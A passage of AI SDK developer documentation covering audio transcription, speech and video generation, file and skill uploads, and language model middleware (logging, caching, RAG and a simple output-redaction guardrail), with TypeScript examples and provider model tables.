Together.ai	`black-forest-labs/FLUX.1-dev`	512x512, 768x768, 1024x1024
Together.ai	`black-forest-labs/FLUX.1-dev-lora`	512x512, 768x768, 1024x1024
Together.ai	`black-forest-labs/FLUX.1-schnell`	512x512, 768x768, 1024x1024
Together.ai	`black-forest-labs/FLUX.1-canny`	512x512, 768x768, 1024x1024
Together.ai	`black-forest-labs/FLUX.1-depth`	512x512, 768x768, 1024x1024
Together.ai	`black-forest-labs/FLUX.1-redux`	512x512, 768x768, 1024x1024
Together.ai	`black-forest-labs/FLUX.1.1-pro`	512x512, 768x768, 1024x1024
Together.ai	`black-forest-labs/FLUX.1-pro`	512x512, 768x768, 1024x1024
Together.ai	`black-forest-labs/FLUX.1-schnell-Free`	512x512, 768x768, 1024x1024
Black Forest Labs	`flux-kontext-pro`	From 3:7 (portrait) to 7:3 (landscape)
Black Forest Labs	`flux-kontext-max`	From 3:7 (portrait) to 7:3 (landscape)
Black Forest Labs	`flux-pro-1.1-ultra`	From 3:7 (portrait) to 7:3 (landscape)
Black Forest Labs	`flux-pro-1.1`	From 3:7 (portrait) to 7:3 (landscape)
Black Forest Labs	`flux-pro-1.0-fill`	From 3:7 (portrait) to 7:3 (landscape)

Above are a small subset of the image models supported by the AI SDK providers. For more, see the respective provider documentation.

title: Transcription description: Learn how to transcribe audio with the AI SDK.

Transcription

Transcription is an experimental feature.

The AI SDK provides the transcribe function to transcribe audio using a transcription model.

import { experimental_transcribe as transcribe } from 'ai';
import { openai } from '@ai-sdk/openai';
import { readFile } from 'fs/promises';

const transcript = await transcribe({
  model: openai.transcription('whisper-1'),
  audio: await readFile('audio.mp3'),
});

The audio property can be a Uint8Array, ArrayBuffer, Buffer, string (base64 encoded audio data), or a URL.

To access the generated transcript:

const text = transcript.text; // transcript text e.g. "Hello, world!"
const segments = transcript.segments; // array of segments with start and end times, if available
const language = transcript.language; // language of the transcript e.g. "en", if available
const durationInSeconds = transcript.durationInSeconds; // duration of the transcript in seconds, if available

Settings

Provider-Specific settings

Transcription models often have provider or model-specific settings which you can set using the providerOptions parameter.

import { experimental_transcribe as transcribe } from 'ai';
import { openai } from '@ai-sdk/openai';
import { readFile } from 'fs/promises';

const transcript = await transcribe({
  model: openai.transcription('whisper-1'),
  audio: await readFile('audio.mp3'),
  providerOptions: {
    openai: {
      timestampGranularities: ['word'],
    },
  },
});

Download Size Limits

When audio is a URL, the SDK downloads the file with a default 2 GiB size limit. You can customize this using createDownload:

import { experimental_transcribe as transcribe, createDownload } from 'ai';
import { openai } from '@ai-sdk/openai';

const transcript = await transcribe({
  model: openai.transcription('whisper-1'),
  audio: new URL('https://example.com/audio.mp3'),
  download: createDownload({ maxBytes: 50 * 1024 * 1024 }), // 50 MB limit
});

You can also provide a fully custom download function:

import { experimental_transcribe as transcribe } from 'ai';
import { openai } from '@ai-sdk/openai';

const transcript = await transcribe({
  model: openai.transcription('whisper-1'),
  audio: new URL('https://example.com/audio.mp3'),
  download: async ({ url }) => {
    const res = await myAuthenticatedFetch(url);
    return {
      data: new Uint8Array(await res.arrayBuffer()),
      mediaType: res.headers.get('content-type') ?? undefined,
    };
  },
});

If a download exceeds the size limit, a DownloadError is thrown:

import { experimental_transcribe as transcribe, DownloadError } from 'ai';
import { openai } from '@ai-sdk/openai';

try {
  await transcribe({
    model: openai.transcription('whisper-1'),
    audio: new URL('https://example.com/audio.mp3'),
  });
} catch (error) {
  if (DownloadError.isInstance(error)) {
    console.log('Download failed:', error.message);
  }
}

Abort Signals and Timeouts

transcribe accepts an optional abortSignal parameter of type AbortSignal that you can use to abort the transcription process or set a timeout.

This is particularly useful when combined with URL downloads to prevent long-running requests:

import { openai } from '@ai-sdk/openai';
import { experimental_transcribe as transcribe } from 'ai';

const transcript = await transcribe({
  model: openai.transcription('whisper-1'),
  audio: new URL('https://example.com/audio.mp3'),
  abortSignal: AbortSignal.timeout(5000), // Abort after 5 seconds
});

Custom Headers

transcribe accepts an optional headers parameter of type Record<string, string> that you can use to add custom headers to the transcription request.

import { openai } from '@ai-sdk/openai';
import { experimental_transcribe as transcribe } from 'ai';
import { readFile } from 'fs/promises';

const transcript = await transcribe({
  model: openai.transcription('whisper-1'),
  audio: await readFile('audio.mp3'),
  headers: { 'X-Custom-Header': 'custom-value' },
});

Warnings

Warnings (e.g. unsupported parameters) are available on the warnings property.

import { openai } from '@ai-sdk/openai';
import { experimental_transcribe as transcribe } from 'ai';
import { readFile } from 'fs/promises';

const transcript = await transcribe({
  model: openai.transcription('whisper-1'),
  audio: await readFile('audio.mp3'),
});

const warnings = transcript.warnings;

Error Handling

When transcribe cannot generate a valid transcript, it throws a AI_NoTranscriptGeneratedError.

This error can arise for any of the following reasons:

The model failed to generate a response
The model generated a response that could not be parsed

The error preserves the following information to help you log the issue:

responses: Metadata about the transcription model responses, including timestamp, model, and headers.
cause: The cause of the error. You can use this for more detailed error handling.

import {
  experimental_transcribe as transcribe,
  NoTranscriptGeneratedError,
} from 'ai';
import { openai } from '@ai-sdk/openai';
import { readFile } from 'fs/promises';

try {
  await transcribe({
    model: openai.transcription('whisper-1'),
    audio: await readFile('audio.mp3'),
  });
} catch (error) {
  if (NoTranscriptGeneratedError.isInstance(error)) {
    console.log('NoTranscriptGeneratedError');
    console.log('Cause:', error.cause);
    console.log('Responses:', error.responses);
  }
}

Transcription Models

Provider	Model
OpenAI	`whisper-1`
OpenAI	`gpt-4o-transcribe`
OpenAI	`gpt-4o-mini-transcribe`
ElevenLabs	`scribe_v1`
ElevenLabs	`scribe_v1_experimental`
Groq	`whisper-large-v3-turbo`
Groq	`whisper-large-v3`
Azure OpenAI	`whisper-1`
Azure OpenAI	`gpt-4o-transcribe`
Azure OpenAI	`gpt-4o-mini-transcribe`
Rev.ai	`machine`
Rev.ai	`low_cost`
Rev.ai	`fusion`
Deepgram	`base` (+ variants)
Deepgram	`enhanced` (+ variants)
Deepgram	`nova` (+ variants)
Deepgram	`nova-2` (+ variants)
Deepgram	`nova-3` (+ variants)
Gladia	`default`
AssemblyAI	`best`
AssemblyAI	`nano`
Fal	`whisper`
Fal	`wizper`

Above are a small subset of the transcription models supported by the AI SDK providers. For more, see the respective provider documentation.

title: Speech description: Learn how to generate speech from text with the AI SDK.

Speech

Speech is an experimental feature.

The AI SDK provides the generateSpeech function to generate speech from text using a speech model.

import { experimental_generateSpeech as generateSpeech } from 'ai';
import { openai } from '@ai-sdk/openai';

const audio = await generateSpeech({
  model: openai.speech('tts-1'),
  text: 'Hello, world!',
  voice: 'alloy',
});

Language Setting

You can specify the language for speech generation (provider support varies):

import { experimental_generateSpeech as generateSpeech } from 'ai';
import { lmnt } from '@ai-sdk/lmnt';

const audio = await generateSpeech({
  model: lmnt.speech('aurora'),
  text: 'Hola, mundo!',
  language: 'es', // Spanish
});

To access the generated audio:

const audioData = result.audio.uint8Array; // audio data as Uint8Array
// or
const audioBase64 = result.audio.base64; // audio data as base64 string

Settings

Provider-Specific settings

You can set model-specific settings with the providerOptions parameter.

import { experimental_generateSpeech as generateSpeech } from 'ai';
import { openai } from '@ai-sdk/openai';

const audio = await generateSpeech({
  model: openai.speech('tts-1'),
  text: 'Hello, world!',
  providerOptions: {
    openai: {
      // ...
    },
  },
});

Abort Signals and Timeouts

generateSpeech accepts an optional abortSignal parameter of type AbortSignal that you can use to abort the speech generation process or set a timeout.

import { openai } from '@ai-sdk/openai';
import { experimental_generateSpeech as generateSpeech } from 'ai';

const audio = await generateSpeech({
  model: openai.speech('tts-1'),
  text: 'Hello, world!',
  abortSignal: AbortSignal.timeout(1000), // Abort after 1 second
});

Custom Headers

generateSpeech accepts an optional headers parameter of type Record<string, string> that you can use to add custom headers to the speech generation request.

import { openai } from '@ai-sdk/openai';
import { experimental_generateSpeech as generateSpeech } from 'ai';

const audio = await generateSpeech({
  model: openai.speech('tts-1'),
  text: 'Hello, world!',
  headers: { 'X-Custom-Header': 'custom-value' },
});

Warnings

Warnings (e.g. unsupported parameters) are available on the warnings property.

import { openai } from '@ai-sdk/openai';
import { experimental_generateSpeech as generateSpeech } from 'ai';

const audio = await generateSpeech({
  model: openai.speech('tts-1'),
  text: 'Hello, world!',
});

const warnings = audio.warnings;

Error Handling

When generateSpeech cannot generate a valid audio, it throws a AI_NoSpeechGeneratedError.

This error can arise for any of the following reasons:

The model failed to generate a response
The model generated a response that could not be parsed

The error preserves the following information to help you log the issue:

responses: Metadata about the speech model responses, including timestamp, model, and headers.
cause: The cause of the error. You can use this for more detailed error handling.

import {
  experimental_generateSpeech as generateSpeech,
  NoSpeechGeneratedError,
} from 'ai';
import { openai } from '@ai-sdk/openai';

try {
  await generateSpeech({
    model: openai.speech('tts-1'),
    text: 'Hello, world!',
  });
} catch (error) {
  if (NoSpeechGeneratedError.isInstance(error)) {
    console.log('AI_NoSpeechGeneratedError');
    console.log('Cause:', error.cause);
    console.log('Responses:', error.responses);
  }
}

Speech Models

Provider	Model
OpenAI	`tts-1`
OpenAI	`tts-1-hd`
OpenAI	`gpt-4o-mini-tts`
ElevenLabs	`eleven_v3`
ElevenLabs	`eleven_multilingual_v2`
ElevenLabs	`eleven_flash_v2_5`
ElevenLabs	`eleven_flash_v2`
ElevenLabs	`eleven_turbo_v2_5`
ElevenLabs	`eleven_turbo_v2`
LMNT	`aurora`
LMNT	`blizzard`
Hume	`default`

Above are a small subset of the speech models supported by the AI SDK providers. For more, see the respective provider documentation.

title: Video Generation description: Learn how to generate videos with the AI SDK.

Video Generation

The AI SDK provides the experimental_generateVideo function to generate videos based on a given prompt using a video model.

import { experimental_generateVideo as generateVideo } from 'ai';
__PROVIDER_IMPORT__;

const { video } = await generateVideo({
  model: __VIDEO_MODEL__,
  prompt: 'A cat walking on a treadmill',
});

You can access the video data using the base64 or uint8Array properties:

const base64 = video.base64; // base64 video data
const uint8Array = video.uint8Array; // Uint8Array video data

Settings

Aspect Ratio

The aspect ratio is specified as a string in the format {width}:{height}. Models only support a few aspect ratios, and the supported aspect ratios are different for each model and provider.

import { experimental_generateVideo as generateVideo } from 'ai';
__PROVIDER_IMPORT__;

const { video } = await generateVideo({
  model: __VIDEO_MODEL__,
  prompt: 'A cat walking on a treadmill',
  aspectRatio: '16:9',
});

Resolution

The resolution is specified as a string in the format {width}x{height}. Models only support specific resolutions, and the supported resolutions are different for each model and provider.

import { experimental_generateVideo as generateVideo } from 'ai';
__PROVIDER_IMPORT__;

const { video } = await generateVideo({
  model: __VIDEO_MODEL__,
  prompt: 'A serene mountain landscape at sunset',
  resolution: '1280x720',
});

Duration

Some video models support specifying the duration of the generated video in seconds.

import { experimental_generateVideo as generateVideo } from 'ai';
__PROVIDER_IMPORT__;

const { video } = await generateVideo({
  model: __VIDEO_MODEL__,
  prompt: 'A timelapse of clouds moving across the sky',
  duration: 5,
});

Frames Per Second (FPS)

Some video models allow you to specify the frames per second for the generated video.

import { experimental_generateVideo as generateVideo } from 'ai';
__PROVIDER_IMPORT__;

const { video } = await generateVideo({
  model: __VIDEO_MODEL__,
  prompt: 'A hummingbird in slow motion',
  fps: 24,
});

Generating Multiple Videos

experimental_generateVideo supports generating multiple videos at once:

import { experimental_generateVideo as generateVideo } from 'ai';
__PROVIDER_IMPORT__;

const { videos } = await generateVideo({
  model: __VIDEO_MODEL__,
  prompt: 'A rocket launching into space',
  n: 3, // number of videos to generate
});

If needed, you can override this behavior using the maxVideosPerCall setting:

const { videos } = await generateVideo({
  model: __VIDEO_MODEL__,
  prompt: 'A rocket launching into space',
  maxVideosPerCall: 2, // Override the default batch size
  n: 4, // Will make 2 calls of 2 videos each
});

Image-to-Video Generation

Some video models support generating videos from an input image. You can provide an image using the prompt object:

import { experimental_generateVideo as generateVideo } from 'ai';
__PROVIDER_IMPORT__;

const { video } = await generateVideo({
  model: __VIDEO_MODEL__,
  prompt: {
    image: 'https://example.com/my-image.png',
    text: 'Animate this image with gentle motion',
  },
});

You can also provide the image as a base64-encoded string or Uint8Array:

const { video } = await generateVideo({
  model: __VIDEO_MODEL__,
  prompt: {
    image: imageBase64String, // or imageUint8Array
    text: 'Animate this image',
  },
});

Providing a Seed

You can provide a seed to the experimental_generateVideo function to control the output of the video generation process. If supported by the model, the same seed will always produce the same video.

import { experimental_generateVideo as generateVideo } from 'ai';
__PROVIDER_IMPORT__;

const { video } = await generateVideo({
  model: __VIDEO_MODEL__,
  prompt: 'A cat walking on a treadmill',
  seed: 1234567890,
});

Provider-specific Settings

import { experimental_generateVideo as generateVideo } from 'ai';
import { fal } from '@ai-sdk/fal';

const { video } = await generateVideo({
  model: fal.video('luma-dream-machine/ray-2'),
  prompt: 'A cat walking on a treadmill',
  aspectRatio: '16:9',
  providerOptions: {
    fal: { loop: true, motionStrength: 0.8 },
  },
});

Abort Signals and Timeouts

experimental_generateVideo accepts an optional abortSignal parameter of type AbortSignal that you can use to abort the video generation process or set a timeout.

import { experimental_generateVideo as generateVideo } from 'ai';
__PROVIDER_IMPORT__;

const { video } = await generateVideo({
  model: __VIDEO_MODEL__,
  prompt: 'A cat walking on a treadmill',
  abortSignal: AbortSignal.timeout(60000), // Abort after 60 seconds
});

Polling Timeout

You can configure the polling timeout using provider-specific options. Each provider exports a type for its options that you can use with satisfies for type safety:

import { experimental_generateVideo as generateVideo } from 'ai';
import { fal, type FalVideoModelOptions } from '@ai-sdk/fal';

const { video } = await generateVideo({
  model: fal.video('luma-dream-machine/ray-2'),
  prompt: 'A cinematic timelapse of a city from dawn to dusk',
  duration: 10,
  providerOptions: {
    fal: {
      pollTimeoutMs: 600000, // 10 minutes
    } satisfies FalVideoModelOptions,
  },
});

Custom Headers

experimental_generateVideo accepts an optional headers parameter of type Record<string, string> that you can use to add custom headers to the video generation request.

import { experimental_generateVideo as generateVideo } from 'ai';
__PROVIDER_IMPORT__;

const { video } = await generateVideo({
  model: __VIDEO_MODEL__,
  prompt: 'A cat walking on a treadmill',
  headers: { 'X-Custom-Header': 'custom-value' },
});

Warnings

If the model returns warnings, e.g. for unsupported parameters, they will be available in the warnings property of the response.

const { video, warnings } = await generateVideo({
  model: __VIDEO_MODEL__,
  prompt: 'A cat walking on a treadmill',
});

Additional Provider-specific Metadata

Some providers expose additional metadata for the result overall or per video.

const prompt = 'A cat walking on a treadmill';

const { video, providerMetadata } = await generateVideo({
  model: fal.video('luma-dream-machine/ray-2'),
  prompt,
});

// Access provider-specific metadata
const videoMetadata = providerMetadata.fal?.videos[0];
console.log({
  duration: videoMetadata?.duration,
  fps: videoMetadata?.fps,
  width: videoMetadata?.width,
  height: videoMetadata?.height,
});

When generating multiple videos with n > 1, you can also access per-call metadata through the responses array:

const { videos, responses } = await generateVideo({
  model: __VIDEO_MODEL__,
  prompt: 'A rocket launching into space',
  n: 5, // May require multiple API calls
});

// Access metadata from each individual API call
for (const response of responses) {
  console.log({
    timestamp: response.timestamp,
    modelId: response.modelId,
    // Per-call provider metadata (lossless)
    providerMetadata: response.providerMetadata,
  });
}

Error Handling

When experimental_generateVideo cannot generate a valid video, it throws a AI_NoVideoGeneratedError.

This error occurs when the AI provider fails to generate a video. It can arise due to the following reasons:

The model failed to generate a response
The model generated a response that could not be parsed

The error preserves the following information to help you log the issue:

responses: Metadata about the video model responses, including timestamp, model, and headers.
cause: The cause of the error. You can use this for more detailed error handling

import {
  experimental_generateVideo as generateVideo,
  NoVideoGeneratedError,
} from 'ai';

try {
  await generateVideo({ model, prompt });
} catch (error) {
  if (NoVideoGeneratedError.isInstance(error)) {
    console.log('NoVideoGeneratedError');
    console.log('Cause:', error.cause);
    console.log('Responses:', error.responses);
  }
}

Video Models

Provider	Model	Features
FAL	`luma-dream-machine/ray-2`	Text-to-video, image-to-video
FAL	`minimax-video`	Text-to-video
Google	`veo-2.0-generate-001`	Text-to-video, up to 4 videos per call
Google Vertex	`veo-3.1-generate-001`	Text-to-video, audio generation
Google Vertex	`veo-3.1-fast-generate-001`	Text-to-video, audio generation
Google Vertex	`veo-3.0-generate-001`	Text-to-video, audio generation
Google Vertex	`veo-3.0-fast-generate-001`	Text-to-video, audio generation
Google Vertex	`veo-2.0-generate-001`	Text-to-video, up to 4 videos per call
Kling AI	`kling-v2.6-t2v`	Text-to-video
Kling AI	`kling-v2.6-i2v`	Image-to-video
Kling AI	`kling-v2.6-motion-control`	Motion control
Replicate	`minimax/video-01`	Text-to-video
xAI	`grok-imagine-video`	Text-to-video, image-to-video, editing, extension, R2V

Above are a small subset of the video models supported by the AI SDK providers. For more, see the respective provider documentation.

title: File Uploads description: Learn how to upload files and use provider references with the AI SDK.

File Uploads

The AI SDK provides the uploadFile function to upload files to a provider and get back a ProviderReference that can be used in subsequent API calls.

In the AI SDK, the uploaded file is identified by a ProviderReference — a Record<string, string> mapping provider names to provider-specific identifiers. This concept is used for other provider specific asset references too, such as uploaded skills.

import { uploadFile, generateText } from 'ai';
import { openai } from '@ai-sdk/openai';
import fs from 'node:fs';

const { providerReference } = await uploadFile({
  api: openai.files(),
  data: fs.readFileSync('./photo.png'),
  filename: 'photo.png',
});

const { text } = await generateText({
  model: openai.responses('gpt-4o-mini'),
  messages: [
    {
      role: 'user',
      content: [
        { type: 'text', text: 'Describe what you see in this image.' },
        { type: 'image', image: providerReference },
      ],
    },
  ],
});

As a shorthand, you can pass a provider instance directly to api instead of calling .files() explicitly — the SDK will call .files() for you:

const { providerReference } = await uploadFile({
  api: openai, // shorthand for openai.files()
  data: fs.readFileSync('./photo.png'),
  filename: 'photo.png',
});

Supported File Types

You can upload images, PDFs, text files, and other documents depending on the provider. The media type is auto-detected from the file bytes when not specified explicitly:

const { providerReference } = await uploadFile({
  api: anthropic.files(),
  data: fs.readFileSync('./document.pdf'),
  mediaType: 'application/pdf', // optional, auto-detected if omitted
  filename: 'document.pdf',
});

Use the providerReference in a file content part with its media type:

{
  role: 'user',
  content: [
    { type: 'text', text: 'Summarize this document.' },
    { type: 'file', data: providerReference, mediaType: 'application/pdf' },
  ],
}

Provider-Specific Options

Some providers accept additional options through providerOptions. For example, OpenAI requires a purpose field:

import { openai, type OpenAIFilesOptions } from '@ai-sdk/openai';

const { providerReference } = await uploadFile({
  api: openai.files(),
  data: fs.readFileSync('./photo.png'),
  providerOptions: {
    openai: {
      purpose: 'assistants',
    } satisfies OpenAIFilesOptions,
  },
});

Provider References

A ProviderReference is a Record<string, string> that maps provider names to provider-specific file identifiers:

// Example ProviderReference
{
  openai: 'file-abc123',
}

When you pass a ProviderReference as the data or image field of a message content part, the provider looks up its own file ID from the reference. If the reference doesn't contain an entry for the current provider, an error is thrown.

Multi-Provider Usage

If you switch providers mid-conversation (for example, continuing a chat started with OpenAI using Anthropic), you need to upload the file to both providers and merge the references:

const openaiResult = await uploadFile({
  api: openai.files(),
  data: imageBytes,
  filename: 'photo.png',
});

const anthropicResult = await uploadFile({
  api: anthropic.files(),
  data: imageBytes,
  filename: 'photo.png',
});

const mergedReference = {
  ...openaiResult.providerReference,
  ...anthropicResult.providerReference,
};

// mergedReference: { openai: 'file-abc123', anthropic: 'file-xyz789' }

The merged reference can then be used in messages regardless of which provider processes the request — each provider will find its own file ID.

Supported Providers

The following providers support files() and file uploads:

Provider	Factory Method
Anthropic	`anthropic.files()`
Google	`google.files()`
OpenAI	`openai.files()`
xAI	`xai.files()`

Providers without file upload support will throw an UnsupportedFunctionalityError if they encounter a provider reference in a message.

title: Language Model Middleware description: Learn how to use middleware to enhance the behavior of language models

Language Model Middleware

Language model middleware is a way to enhance the behavior of language models by intercepting and modifying the calls to the language model.

Using Language Model Middleware

import { wrapLanguageModel, streamText } from 'ai';

const wrappedLanguageModel = wrapLanguageModel({
  model: yourModel,
  middleware: yourLanguageModelMiddleware,
});

The wrapped language model can be used just like any other language model, e.g. in streamText:

const result = streamText({
  model: wrappedLanguageModel,
  prompt: 'What cities are in the United States?',
});

Multiple middlewares

You can provide multiple middlewares to the wrapLanguageModel function. The middlewares will be applied in the order they are provided.

const wrappedLanguageModel = wrapLanguageModel({
  model: yourModel,
  middleware: [firstMiddleware, secondMiddleware],
});

// applied as: firstMiddleware(secondMiddleware(yourModel))

Built-in Middleware

The AI SDK comes with several built-in middlewares that you can use to configure language models:

extractReasoningMiddleware: Extracts reasoning information from the generated text and exposes it as a reasoning property on the result.
extractJsonMiddleware: Extracts JSON from text content by stripping markdown code fences. Useful when using Output.object() with models that wrap JSON responses in code blocks.
simulateStreamingMiddleware: Simulates streaming behavior with responses from non-streaming language models.
defaultSettingsMiddleware: Applies default settings to a language model.
addToolInputExamplesMiddleware: Adds tool input examples to tool descriptions for providers that don't natively support the inputExamples property.

Extract Reasoning

Some providers and models expose reasoning information in the generated text using special tags, e.g. <think> and </think>.

The extractReasoningMiddleware function can be used to extract this reasoning information and expose it as a reasoning property on the result.

import { wrapLanguageModel, extractReasoningMiddleware } from 'ai';

const model = wrapLanguageModel({
  model: yourModel,
  middleware: extractReasoningMiddleware({ tagName: 'think' }),
});

You can then use that enhanced model in functions like generateText and streamText.

Extract JSON

Some models wrap JSON responses in markdown code fences (e.g., ```json ... ```) even when you request structured output.

The extractJsonMiddleware function strips these code fences from the response, making it compatible with Output.object().

import {
  wrapLanguageModel,
  extractJsonMiddleware,
  Output,
  generateText,
} from 'ai';
import { z } from 'zod';

const model = wrapLanguageModel({
  model: yourModel,
  middleware: extractJsonMiddleware(),
});

const result = await generateText({
  model,
  output: Output.object({
    schema: z.object({
      name: z.string(),
      ingredients: z.array(z.string()),
    }),
  }),
  prompt: 'Generate a recipe.',
});

You can also provide a custom transform function for models that use different formatting:

const model = wrapLanguageModel({
  model: yourModel,
  middleware: extractJsonMiddleware({
    transform: text => text.replace(/^PREFIX/, '').replace(/SUFFIX$/, ''),
  }),
});

Simulate Streaming

import { wrapLanguageModel, simulateStreamingMiddleware } from 'ai';

const model = wrapLanguageModel({
  model: yourModel,
  middleware: simulateStreamingMiddleware(),
});

Default Settings

The defaultSettingsMiddleware function can be used to apply default settings to a language model.

import { wrapLanguageModel, defaultSettingsMiddleware } from 'ai';

const model = wrapLanguageModel({
  model: yourModel,
  middleware: defaultSettingsMiddleware({
    settings: {
      temperature: 0.5,
      maxOutputTokens: 800,
      providerOptions: { openai: { store: false } },
    },
  }),
});

Add Tool Input Examples

import { wrapLanguageModel, addToolInputExamplesMiddleware } from 'ai';

const model = wrapLanguageModel({
  model: yourModel,
  middleware: addToolInputExamplesMiddleware({
    prefix: 'Input Examples:',
  }),
});

When you define a tool with inputExamples, the middleware will append them to the tool's description:

import { generateText, tool } from 'ai';
import { z } from 'zod';

const result = await generateText({
  model, // wrapped model from above
  tools: {
    weather: tool({
      description: 'Get the weather in a location',
      inputSchema: z.object({
        location: z.string(),
      }),
      inputExamples: [
        { input: { location: 'San Francisco' } },
        { input: { location: 'London' } },
      ],
    }),
  },
  prompt: 'What is the weather in Tokyo?',
});

The tool description will be transformed to:

Get the weather in a location

Input Examples:
{"location":"San Francisco"}
{"location":"London"}

Options

prefix (optional): A prefix text to prepend before the examples. Default: 'Input Examples:'.
format (optional): A custom formatter function for each example. Receives the example object and its index. Default: JSON.stringify(example.input).
remove (optional): Whether to remove the inputExamples property from the tool after adding them to the description. Default: true.

const model = wrapLanguageModel({
  model: yourModel,
  middleware: addToolInputExamplesMiddleware({
    prefix: 'Input Examples:',
    format: (example, index) =>
      `${index + 1}. ${JSON.stringify(example.input)}`,
    remove: true,
  }),
});

Community Middleware

The AI SDK provides a Language Model Middleware specification. Community members can develop middleware that adheres to this specification, making it compatible with the AI SDK ecosystem.

Here are some community middlewares that you can explore:

Custom tool call parser

The @ai-sdk-tool/parser package offers three middleware variants:

createToolMiddleware: A flexible function for creating custom tool call middleware tailored to specific models
hermesToolMiddleware: Ready-to-use middleware for Hermes & Qwen format function calls
gemmaToolMiddleware: Pre-configured middleware for Gemma 3 model series function call format

Here's how you can enable function calls with Gemma models that don't support them natively:

import { wrapLanguageModel } from 'ai';
import { gemmaToolMiddleware } from '@ai-sdk-tool/parser';

const model = wrapLanguageModel({
  model: openrouter('google/gemma-3-27b-it'),
  middleware: gemmaToolMiddleware,
});

Find more examples at this link.

Implementing Language Model Middleware

You can implement any of the following three function to modify the behavior of the language model:

transformParams: Transforms the parameters before they are passed to the language model, for both doGenerate and doStream.
wrapGenerate: Wraps the doGenerate method of the language model. You can modify the parameters, call the language model, and modify the result.
wrapStream: Wraps the doStream method of the language model. You can modify the parameters, call the language model, and modify the result.

Here are some examples of how to implement language model middleware:

Examples

Logging

This example shows how to log the parameters and generated text of a language model call.

import type {
  LanguageModelV4Middleware,
  LanguageModelV4StreamPart,
} from '@ai-sdk/provider';

export const yourLogMiddleware: LanguageModelV4Middleware = {
  wrapGenerate: async ({ doGenerate, params }) => {
    console.log('doGenerate called');
    console.log(`params: ${JSON.stringify(params, null, 2)}`);

    const result = await doGenerate();

    console.log('doGenerate finished');
    console.log(`generated text: ${result.text}`);

    return result;
  },

  wrapStream: async ({ doStream, params }) => {
    console.log('doStream called');
    console.log(`params: ${JSON.stringify(params, null, 2)}`);

    const { stream, ...rest } = await doStream();

    let generatedText = '';
    const textBlocks = new Map<string, string>();

    const transformStream = new TransformStream<
      LanguageModelV4StreamPart,
      LanguageModelV4StreamPart
    >({
      transform(chunk, controller) {
        switch (chunk.type) {
          case 'text-start': {
            textBlocks.set(chunk.id, '');
            break;
          }
          case 'text-delta': {
            const existing = textBlocks.get(chunk.id) || '';
            textBlocks.set(chunk.id, existing + chunk.delta);
            generatedText += chunk.delta;
            break;
          }
          case 'text-end': {
            console.log(
              `Text block ${chunk.id} completed:`,
              textBlocks.get(chunk.id),
            );
            break;
          }
        }

        controller.enqueue(chunk);
      },

      flush() {
        console.log('doStream finished');
        console.log(`generated text: ${generatedText}`);
      },
    });

    return {
      stream: stream.pipeThrough(transformStream),
      ...rest,
    };
  },
};

Caching

This example shows how to build a simple cache for the generated text of a language model call.

import type { LanguageModelV4Middleware } from '@ai-sdk/provider';

const cache = new Map<string, any>();

export const yourCacheMiddleware: LanguageModelV4Middleware = {
  wrapGenerate: async ({ doGenerate, params }) => {
    const cacheKey = JSON.stringify(params);

    if (cache.has(cacheKey)) {
      return cache.get(cacheKey);
    }

    const result = await doGenerate();

    cache.set(cacheKey, result);

    return result;
  },

  // here you would implement the caching logic for streaming
};

Retrieval Augmented Generation (RAG)

This example shows how to use RAG as middleware.

import type { LanguageModelV4Middleware } from '@ai-sdk/provider';

export const yourRagMiddleware: LanguageModelV4Middleware = {
  transformParams: async ({ params }) => {
    const lastUserMessageText = getLastUserMessageText({
      prompt: params.prompt,
    });

    if (lastUserMessageText == null) {
      return params; // do not use RAG (send unmodified parameters)
    }

    const instruction =
      'Use the following information to answer the question:\n' +
      findSources({ text: lastUserMessageText })
        .map(chunk => JSON.stringify(chunk))
        .join('\n');

    return addToLastUserMessage({ params, text: instruction });
  },
};

Guardrails

Guard rails are a way to ensure that the generated text of a language model call is safe and appropriate. This example shows how to use guardrails as middleware.

import type { LanguageModelV4Middleware } from '@ai-sdk/provider';

export const yourGuardrailMiddleware: LanguageModelV4Middleware = {
  wrapGenerate: async ({ doGenerate }) => {
    const { text, ...rest } = await doGenerate();

    // filtering approach, e.g. for PII or other sensitive information:
    const cleanedText = text?.replace(/badword/g, '<REDACTED>');

    return { text: cleanedText, ...rest };
  },

  // here you would implement the guardrail logic for streaming
  // Note: streaming guardrails are difficult to implement, because
  // you do not know the full content of the stream until it's finished.
};

Configuring Per Request Custom Metadata

import { generateText, wrapLanguageModel } from 'ai';
__PROVIDER_IMPORT__;
import type { LanguageModelV4Middleware } from '@ai-sdk/provider';

export const yourLogMiddleware: LanguageModelV4Middleware = {
  wrapGenerate: async ({ doGenerate, params }) => {
    console.log('METADATA', params?.providerMetadata?.yourLogMiddleware);
    const result = await doGenerate();
    return result;
  },
};

const { text } = await generateText({
  model: wrapLanguageModel({
    model: __MODEL__,
    middleware: yourLogMiddleware,
  }),
  prompt: 'Invent a new holiday and describe its traditions.',
  providerOptions: {
    yourLogMiddleware: {
      hello: 'world',
    },
  },
});

console.log(text);

title: Skill Uploads description: Learn how to upload skills and use provider references with the AI SDK.

Skill Uploads

The AI SDK provides the uploadSkill function to upload custom skills to a provider and get back a ProviderReference that can be passed to subsequent inference calls.

A skill is a bundle of files (e.g. a SKILL.md describing the skill's behavior) that providers can load, e.g. in sandboxed container environments.

In the AI SDK, the uploaded skill is identified by a ProviderReference — a Record<string, string> mapping provider names to provider-specific identifiers. This concept is used for other provider specific asset references too, such as uploaded media files.

import { uploadSkill, generateText } from 'ai';
import { anthropic, type AnthropicLanguageModelOptions } from '@ai-sdk/anthropic';
import { readFileSync } from 'fs';

const { providerReference } = await uploadSkill({
  api: anthropic.skills(),
  files: [
    {
      path: 'my-skill/SKILL.md',
      content: readFileSync('./SKILL.md'),
    },
  ],
  displayTitle: 'My Skill',
});

const { text } = await generateText({
  model: anthropic('claude-sonnet-4-6'),
  tools: {
    code_execution: anthropic.tools.codeExecution_20260120(),
  },
  prompt: 'Use the skill to complete the task.',
  providerOptions: {
    anthropic: {
      container: {
        skills: [{ type: 'custom', providerReference }],
      },
    } satisfies AnthropicLanguageModelOptions,
  },
});

As a shorthand, you can pass a provider instance directly to api instead of calling .skills() explicitly — the SDK will call .skills() for you:

const { providerReference } = await uploadSkill({
  api: anthropic, // shorthand for anthropic.skills()
  files: [{ path: 'my-skill/SKILL.md', content: readFileSync('./SKILL.md') }],
  displayTitle: 'My Skill',
});

Skill Files

A skill is composed of one or more files, each with a relative path and content. File content can be provided as a Uint8Array (e.g. from fs.readFileSync) or as a base64-encoded string:

const { providerReference } = await uploadSkill({
  api: openai.skills(),
  files: [
    {
      path: 'my-skill/SKILL.md',
      content: readFileSync('./SKILL.md'), // Uint8Array
    },
    {
